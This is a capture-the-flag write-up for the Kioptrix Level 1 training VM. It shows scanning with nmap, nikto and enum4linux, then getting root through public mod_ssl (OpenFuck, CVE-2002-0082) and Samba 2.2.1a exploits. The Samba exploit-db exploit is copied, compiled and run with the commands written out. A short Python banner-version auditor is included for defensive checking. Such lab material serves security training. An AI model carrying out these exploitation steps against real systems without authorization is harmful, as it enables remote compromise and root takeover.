Kioptrix: Level 1

This is my writeup for the Kioptrix Level 1 VM from vulnhub.com. It's considered easy. The object of the game is to acquire root access via any means possible. There is more than one way to successfully complete the challenge.

Intelligence Gathering

Let's do an nmap_fast scan.

[Screenshot: nmap_fast scan results]

We now have a list of ports. When we access the IP of the VM on port 80, we see a test page for the Apache Web Server.

[Screenshot: Apache test page]

Let's see what nikto finds on this webserver.

[Screenshot: nikto scan output]

mod_ssl

One interesting part is a vulnerability in mod_ssl which may allow a remote shell:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Searching Google for "OSVDB-756" returns a lot of results about OpenFuck, an exploit that targets mod_ssl. There is even a step-by-step guide for updating the old exploit so that it works with the newer library files for OpenSSL. We need to change the link to the exploit as well.

Samba

From the nmap scan we can see that Samba runs on port 139.
Let's have a closer look.
Running enum4linux tells us that Samba 2.2.1a is installed:

[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.254.162 from srvinfo:
	KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
	platform_id     :	500
	os version      :	4.5
	server type     :	0x9a03
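
The version checks done by hand above can be scripted when auditing your own hosts. This is an added example, not part of the original writeup: it pulls the mod_ssl and Samba versions out of scan output and compares mod_ssl numerically against the 2.8.7 bound from the nikto finding. The function names and the third sample line are assumptions made for illustration.

```python
import re

# Bound from the nikto finding quoted above: "mod_ssl 2.8.7 and lower
# are vulnerable" (CVE-2002-0082).
MOD_SSL_LAST_VULNERABLE = (2, 8, 7)

MOD_SSL_RE = re.compile(r"mod_ssl/(\d+(?:\.\d+)*)")
SAMBA_RE = re.compile(r"Server=\[Samba (\d+(?:\.\d+)*[a-z]?)\]")


def parse_version(text):
    """Turn '2.8.4' into (2, 8, 4) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def audit_banners(lines):
    """Return one finding per distinct product/version seen in scan output."""
    findings = {}
    for line in lines:
        for match in MOD_SSL_RE.finditer(line):
            version = match.group(1)
            vulnerable = parse_version(version) <= MOD_SSL_LAST_VULNERABLE
            findings[("mod_ssl", version)] = (
                "CVE-2002-0082: upgrade past 2.8.7" if vulnerable else "ok"
            )
        for match in SAMBA_RE.finditer(line):
            # The page states no vulnerable range for Samba, so the version
            # is only recorded for manual comparison with vendor advisories.
            findings[("samba", match.group(1))] = "review against advisories"
    return [(prod, ver, note) for (prod, ver), note in sorted(findings.items())]


# Sample input: the first two lines are tool output quoted on this page;
# the last line is constructed to show a version above the bound.
SAMPLE_SCAN_OUTPUT = [
    "mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow",
    "[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]",
    "Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8",
]

if __name__ == "__main__":
    for product, version, note in audit_banners(SAMPLE_SCAN_OUTPUT):
        print(f"{product} {version}: {note}")
```

Comparing versions as integer tuples matters here: as plain strings, "2.8.31" would sort below "2.8.7" and be flagged incorrectly.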

We use searchsploit to find exploits for this version.

$ searchsploit samba 2.2
[Screenshot: searchsploit results for Samba 2.2]

Exploitation

mod_ssl

After updating the exploit, we run it against our victim.

[Screenshot: mod_ssl exploit run]

The flag is located in one of the mails for root:

$ mail 

Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Samba

Let's use the RCE exploit. First we copy the exploit to our working directory:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

Next we need to compile it and make it executable:

$ gcc -o samba_exploit exploit.c
$ chmod +x samba_exploit

Then we run the exploit against our victim (-b is platform selection):

$ ./samba_exploit -b 0 __IP__

[Screenshot: Samba exploit run]

Kioptrix: Level 1 is a good introduction to scanning and running prewritten exploits.